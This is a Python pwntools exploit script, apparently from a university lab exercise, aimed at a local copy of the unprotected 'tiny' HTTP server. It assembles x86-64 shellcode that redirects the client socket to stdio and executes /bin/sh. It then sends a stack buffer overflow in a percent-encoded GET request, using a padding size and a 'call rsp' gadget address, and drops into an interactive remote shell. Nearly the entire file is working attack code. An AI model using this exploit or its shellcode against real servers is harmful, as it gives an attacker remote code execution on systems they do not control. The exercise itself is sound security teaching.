from pwn import *
# pwntools terminal setting: only consulted when pwntools spawns a debugger
# (nothing in this script does). Opens the debugger in a horizontal tmux split.
context.terminal = ['tmux', 'splitw', '-h']
# Target HTTP server (tiny) reached over TCP; both values are also used for the
# Host header of the crafted request.
ADDR = "127.0.0.1"
PORT = 9999
# Local copy of the target binary. It is only loaded to set context.binary,
# i.e. the architecture asm() assembles for. "no protections" presumably means
# no stack canary / NX / PIE: the payload below executes shellcode from the
# stack via a fixed gadget address, and the padding size and gadget address
# are specific to this exact build.
local_file = './tiny.1996' # no protections
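def package_http_request(path, host=None, port=None):
    """Craft the bytes of an HTTP/1.1 GET request whose request-target is ``path``.

    Args:
        path: the request-target. ``bytes`` are inserted verbatim; a ``str`` is
            UTF-8 encoded first. No escaping is applied here, so the caller is
            responsible for percent-encoding anything the target's parser
            would choke on (whitespace, control bytes, '%', '?').
        host: host part of the Host header; defaults to the module-level ADDR.
        port: port part of the Host header; defaults to the module-level PORT.

    Returns:
        The raw request bytes: request line, Host and User-Agent headers, each
        CRLF-terminated, followed by the empty line that ends the header block.
    """
    if host is None:
        host = ADDR
    if port is None:
        port = PORT
    if isinstance(path, str):
        path = path.encode()
    return b"".join([
        b"GET ", path, b" HTTP/1.1\r\n",
        f"Host: {host}:{port}\r\n".encode(),
        b"User-Agent: Hacker\r\n",
        b"\r\n",
    ])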
def c(comment):
    """Pseudo-comment for the inline assembly text.

    Always yields the empty string, so ``{c("...")}`` inside the f-string
    documents an instruction without emitting anything the assembler sees.
    """
    _ = comment  # accepted only so the asm text can carry a note
    return ""
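def _build_shellcode(sock_fd):
    """Return the x86-64 assembly text for the stage that runs after ``call rsp``.

    The stage has three parts:
      1. write(sock_fd, "unimib24", 8): emits a marker straight to the client
         socket so the Python side can tell a successful hijack from a crash;
      2. dup2(sock_fd, 0/1/2): points the worker's stdin/stdout/stderr at the
         socket;
      3. execve("/bin/sh", {NULL}, {NULL}): replaces the worker with a shell.

    Args:
        sock_fd: file descriptor of the accepted client connection inside the
            target. The caller's default of 4 assumes 0-2 are the standard
            streams and 3 is the listening socket; confirm against the target's
            fd layout if the marker never comes back.

    Returns:
        str of assembly for pwntools ``asm()`` (context.binary must be set so
        the right architecture is used); ``c()`` calls are pseudo-comments.
    """
    return f"""
    {c("----------------------------------------")}
    {c("print a marker string to test the socket")}
    {c("----------------------------------------")}
    mov rax, 0x343262696d696e75 {c("'unimib24' as a little-endian qword")}
    push rax
    push rsp
    pop rsi {c("rsi = pointer to the 8-byte marker on the stack")}
    xor rax, rax
    mov al, 0x1 {c("SYS_write")}
    xor rdi, rdi
    mov dil, {sock_fd} {c("client socket fd, not stdout (stdio is redirected only below)")}
    xor rdx, rdx
    mov dl, 0x8 {c("byte count")}
    syscall
    {c("----------------------------------------")}
    {c("Redirect this fork's stdIO to the socket")}
    {c("----------------------------------------")}
    mov rax, 0x21 {c("SYS_dup2")}
    mov rdi, {sock_fd} {c("oldfd = socket")}
    mov rsi, 0 {c("newfd = stdin")}
    syscall
    mov rax, 0x21 {c("SYS_dup2")}
    mov rdi, {sock_fd} {c("oldfd = socket")}
    mov rsi, 1 {c("newfd = stdout")}
    syscall
    mov rax, 0x21 {c("SYS_dup2")}
    mov rdi, {sock_fd} {c("oldfd = socket")}
    mov rsi, 2 {c("newfd = stderr")}
    syscall
    {c("----------------------------------------")}
    {c("exec /bin/sh, transforming this fork ")}
    {c("----------------------------------------")}
    mov rax, 0x0068732f6e69622f {c("'/bin/sh' NUL-terminated, little-endian")}
    push rax
    push rsp
    pop rdi {c("rdi = pointer to '/bin/sh'")}
    mov rax, 0x3b {c("SYS_execve")}
    push 0 {c("NULL terminator for argv/envp")}
    push rsp
    pop rsi {c("rsi = &NULL, i.e. argv = {{NULL}}")}
    mov rdx, rsi {c("envp = argv = {{NULL}}")}
    syscall
    """


def _url_encode(payload):
    """Percent-encode the bytes the target's request parser would not pass through.

    '%' is encoded first so the escapes added afterwards are not double-encoded.
    '?' is encoded because the parser presumably treats it as the query
    separator and would cut the path there. Every byte below 0x21 (NUL, CR,
    LF, space, ...) is encoded because it would end the request-target or the
    request line. Bytes 0x21-0x7f (other than '%' and '?') and 0x80-0xff are
    sent as-is.

    Args:
        payload: raw payload bytes.

    Returns:
        The encoded bytes, safe to splice into the GET request-target.
    """
    encoded = payload.replace(b'%', b'%25').replace(b'?', b'%3f')
    for value in range(0x21):
        encoded = encoded.replace(bytes([value]), f'%{value:02X}'.encode())
    return encoded


def run_expl(*, padding_size=0x230, gadget=0x42840d, sock_fd=4, response_timeout=10):
    """Overflow tiny's request buffer and pop a shell over the client socket.

    Payload layout (the whole thing is percent-encoded into the GET
    request-target)::

        padding_size filler | 8 bytes over saved rbp | gadget address | shellcode

    The gadget is a ``call rsp`` in the unprotected binary: when the overflowed
    function returns it lands on the gadget, which jumps into the shellcode
    sitting right above it on the stack.

    Keyword arguments (defaults match ./tiny.1996):
        padding_size: bytes between the start of the overflowed buffer and the
            saved rbp.
        gadget: address of a ``call rsp`` gadget in the target binary.
        sock_fd: fd of the accepted client connection inside the target; see
            ``_build_shellcode``.
        response_timeout: seconds to wait for the server's 404 body. The
            original waited with the tube's default (effectively forever),
            which hung the script whenever the server went silent.

    Side effects: connects to ADDR:PORT, prints diagnostics, and hands the
    terminal to pwntools ``interactive()`` on success. The connection is
    closed on every exit path. An EOF from the target (worker crashed /
    connection closed) is reported as a failure; other errors propagate.
    """
    p = remote(ADDR, PORT)
    try:
        e = ELF(local_file)
        context.binary = e  # selects the arch asm() assembles for; must precede asm()
        context.log_level = "info"
        shellcode_bytes = asm(_build_shellcode(sock_fd))
        print("shellcode bytes:")
        print(shellcode_bytes)

        # buffer overflow
        expl = _url_encode(
            b'a' * padding_size
            + b'b' * 8            # saved rbp; value is irrelevant
            + p64(gadget)         # saved return address -> call rsp
            + shellcode_bytes     # rsp points here when the gadget fires
        )
        http_req = package_http_request(expl)
        p.send(http_req)
        print("sent these request bytes:")
        print(http_req)

        # The script expects the 404 body before the marker, presumably because
        # the overflowed function only returns after the error response is
        # written. recvuntil() returns b'' when the timeout expires.
        out = p.recvuntil(b'File not found', timeout=response_timeout)
        print(out)
        if not out:
            print("exploitation failed: no HTTP response within timeout")
            return

        # recvuntil() returns b'' on timeout instead of raising, so the marker
        # has to be checked explicitly; the old bare except never fired here and
        # a timeout was reported as "started remote shell".
        success_marker = p.recvuntil(b'unimib24', timeout=1)
        if success_marker:
            print("-------------------")
            print("started remote shell")
            print("type a command")
            print("-------------------")
            p.interactive()
        else:
            print("exploitation failed")
            out = p.clean(timeout=1)
            print(out)
    except EOFError:
        # the target closed the connection, most likely the worker crashed
        print("exploitation failed: connection closed by the target")
    finally:
        p.close()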
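# Only fire the exploit when executed as a script, so the helpers can be
# imported (e.g. to reuse package_http_request) without opening a connection.
if __name__ == "__main__":
    run_expl()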